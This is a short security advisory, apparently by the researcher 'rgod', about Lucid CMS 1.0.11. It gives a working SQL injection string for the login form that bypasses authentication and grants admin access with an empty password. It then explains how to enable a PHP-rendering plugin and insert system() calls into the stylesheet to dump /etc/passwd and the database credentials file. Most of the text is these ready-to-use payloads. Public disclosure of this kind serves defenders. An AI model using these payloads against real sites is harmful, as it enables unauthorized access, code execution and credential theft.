Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution software: site: http://lucidcms.net/ description: lucidCMS is a simple and flexible content management system for the individual or organization that wishes to manage a collection of web pages without the overhead and complexity of other available "community" CMS options. 1) if magic quotes off -> SQL Injection: you can login as admin typing in login form: login: 'UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b204e98 00998ecf8427e','1')/* pass: [nothing] ^ | | this is the hash of...nothing the result of md5(''); note:"login" without spaces the login query become: SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE (at) hotmail (dot) com [email concealed]','d41d8cd98f00b 204e9800998ecf8427e','1')/*' 2) now new admin can edit template and insert evil javascript code, see the phpinfo(), manage users/groups, activate/disable plugins, you can activate renderPHP plugin, add the following line at the end of the main stylesheet: <?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?> to see /etc/passwd file <?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?> to see database username/password, the database name and table prefix... now you have the full control of the database rgod site: http://altervista.org mail: retrogod (at) aliceposta (dot) it [email concealed] original advisory: http://rgod.altervista.org/lucidcms1011.html